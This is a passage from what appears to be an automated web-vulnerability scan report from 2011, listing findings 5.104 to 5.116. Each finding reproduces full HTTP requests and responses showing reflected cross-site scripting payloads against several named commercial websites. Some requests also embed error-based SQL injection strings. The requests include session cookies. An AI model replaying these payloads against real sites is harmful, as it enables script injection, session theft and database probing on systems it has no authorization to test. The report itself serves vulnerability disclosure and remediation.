...[SNIP]...
ked) alert("You haven't selected any items.");
   return(ischecked);
}
function doupdate(){
   document.forms.checkoutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?mode=logineabd5</script><script>alert(1)</script>7b31a895f05&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
...[SNIP]...
5.104. http://www.my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /cart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f00f</script><script>alert(1)</script>5bebd3dd0d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001&9f00f</script><script>alert(1)</script>5bebd3dd0d2=1 HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 12:12:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 24835
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
koutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001&9f00f</script><script>alert(1)</script>5bebd3dd0d2=1';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
var savemenuaction='saveitem';
function dosaveitem(lid){
   if(savemenuaction=='saveitem'){
       if(!checkcheck
...[SNIP]...
5.105. http://www.my-happyfeet.com/cart.asp [refurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /cart.asp

Issue detail

The value of the refurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a19d</script><script>alert(1)</script>4cbf628a43b was submitted in the refurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D00017a19d</script><script>alert(1)</script>4cbf628a43b HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 12:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 24869
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
ckoutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D00017a19d</script><script>alert(1)</script>4cbf628a43b';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
var savemenuaction='saveitem';
function dosaveitem(lid){
   if(savemenuaction=='saveitem'){
       if(!checkchecked
...[SNIP]...
5.106. http://www.nutter.com/careers.php [CareerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The value of the CareerID request parameter is copied into the HTML document as plain text between tags. The payload d9278<script>alert(1)</script>0b50050f2f4 was submitted in the CareerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17d9278<script>alert(1)</script>0b50050f2f4&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:09:11 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 16006

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<BR>sql: SELECT CareerTitle FROM careers WHERE CareerID=17d9278<script>alert(1)</script>0b50050f2f4
<div id="NarrativeText">
...[SNIP]...
5.107. http://www.nutter.com/careers.php [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 98e53<script>alert(1)</script>438881afcf7 was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))98e53<script>alert(1)</script>438881afcf7&CareerID=17&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:08:37 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15919

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<br />
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '98e53<script>alert(1)</script>438881afcf7 LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...
5.108. http://www.paperg.com/jsfb/embed.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6d50b%3balert(1)//7f28521d945 was submitted in the bid parameter. This input was echoed as 6d50b;alert(1)//7f28521d945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=3922&bid=21236d50b%3balert(1)//7f28521d945 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:14:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43841
Connection: Keep-alive
Via: 1.1 AN-0016020122637050


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL21236d50b;alert(1)//7f28521d945 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=21236d50b%3balert(1)//7f28521d945';
// links stylesheets in head
function pg_linkss(filename)
{
   var head = document.getElementsByTagName('head')
...[SNIP]...
5.109. https://www.supermedia.com/spportal/spportalFlow.do [_flowId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the _flowId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99f8c"%3balert(1)//8ec3b57aa3 was submitted in the _flowId parameter. This input was echoed as 99f8c";alert(1)//8ec3b57aa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))99f8c"%3balert(1)//8ec3b57aa3 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource=default; CstrStatus=RVU

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:14:15 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 22973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
nt(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))99f8c";alert(1)//8ec3b57aa3' found; the flows available are: array<String>
...[SNIP]...
5.110. http://www.superpages.com/inc/social/soc.php [cg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/soc.php

Issue detail

The value of the cg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc74"%3balert(1)//9a46c961ede was submitted in the cg parameter. This input was echoed as dbc74";alert(1)//9a46c961ede in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9dbc74"%3balert(1)//9a46c961ede&ml=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:38:58 GMT
Server: Unspecified
Vary: Host
Content-Type: application/javascript
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Fri, 25-Mar-2011 19:53:58 GMT;path=/;httponly
Content-Length: 15089

var IE = document.all?true:false
if (!IE) document.captureEvents(Event.MOUSEMOVE)
document.onmousemove = getMouseXY;
var tempX = 0
var tempY = 0
function getMouseXY(e) {
if (IE) { // grab the x-y po
...[SNIP]...
<a target=\"_blank\" onclick=\"sp_soclink_click_track('')\" href=\"http://www.superpages.com/inc/social/sln.php?n=9dbc74";alert(1)//9a46c961ede&t="+ urlencode(document.title) +"&u="+ urlencode(location.href) +"&s=1\" title=\"\">
...[SNIP]...
5.111. https://www.territoryahead.com/account/login/loginmain%20.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 76ef5--><script>alert(1)</script>094fe3529e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account76ef5--><script>alert(1)</script>094fe3529e8/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:26:04 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301505878&v=3&e=1301507678363
UNIQUE_ID: eLFqGawSrRQAAGXGG2oAAAAM
SCRIPT_URL: /account76ef5--><script>alert(1)</script>094fe3529e8/login/loginmain .jsp
SCRIPT_URI: https://www.territoryahead.com/account76ef5-->
...[SNIP]...
5.112. https://www.territoryahead.com/account/login/loginmain%20.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 9d9e8--><script>alert(1)</script>cf4dc32b2d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login9d9e8--><script>alert(1)</script>cf4dc32b2d0/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
FCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301505878&v=3&e=1301507678363
UNIQUE_ID: mFwE36wSrSgAAEYWqmIAAAAU
SCRIPT_URL: /account/login9d9e8--><script>alert(1)</script>cf4dc32b2d0/loginmain .jsp
SCRIPT_URI: https://www.territoryahead.com/account/login9d9e8-->
...[SNIP]...
5.113. https://www.territoryahead.com/account/login/loginmain%20.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 55d6e--><script>alert(1)</script>83406a853e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp?55d6e--><script>alert(1)</script>83406a853e1=1 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:51 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 37104


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ET https://www.territoryahead.com/errorhandler.jsp?ruleID=8&itemID=0&itemType=ErrorPage&55d6e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E83406a853e1=1&status=404&itemID=0&itemType=ErrorPage&status=404&55d6e--><script>alert(1)</script>83406a853e1=1
Session ID: eDwn-UFCx4o7 (from cookie)

Parameters:
ruleID = 8
itemID = 0
itemID = 0
itemType = ErrorPage
itemType = ErrorPage
status = 404
status = 404
55d6e--&gt;&l
...[SNIP]...
5.114. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7f0d7--><script>alert(1)</script>33d952b95eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account7f0d7--><script>alert(1)</script>33d952b95eb/login/loginmain.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:51:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36978


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
et=Y; 90232094_clogin=l=1301081933&v=3&e=1301083737353; PS_ALL=%23ps_catid%7Eaccount; s_sq=%5B%5BB%5D%5D; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: 65Wsr6wSrSgAAETmf2MAAAAj
SCRIPT_URL: /account7f0d7--><script>alert(1)</script>33d952b95eb/login/loginmain.jsp
SCRIPT_URI: https://www.territoryahead.com/account7f0d7-->
...[SNIP]...
5.115. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 66835--><script>alert(1)</script>be9690c84fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login66835--><script>alert(1)</script>be9690c84fa/loginmain.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:51:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36978


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
90232094_clogin=l=1301081933&v=3&e=1301083737353; PS_ALL=%23ps_catid%7Eaccount; s_sq=%5B%5BB%5D%5D; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: 7JbBaKwSrSgAAEYNO4EAAAAC
SCRIPT_URL: /account/login66835--><script>alert(1)</script>be9690c84fa/loginmain.jsp
SCRIPT_URI: https://www.territoryahead.com/account/login66835-->
...[SNIP]...
5.116. https://www.territoryahead.com/account/orderhistory/orderstatus.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/orderhistory/orderstatus.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 36360--><script>alert(1)</script>6c3f9b7fbac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account36360--><script>alert(1)</script>6c3f9b7fbac/orderhistory/orderstatus.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
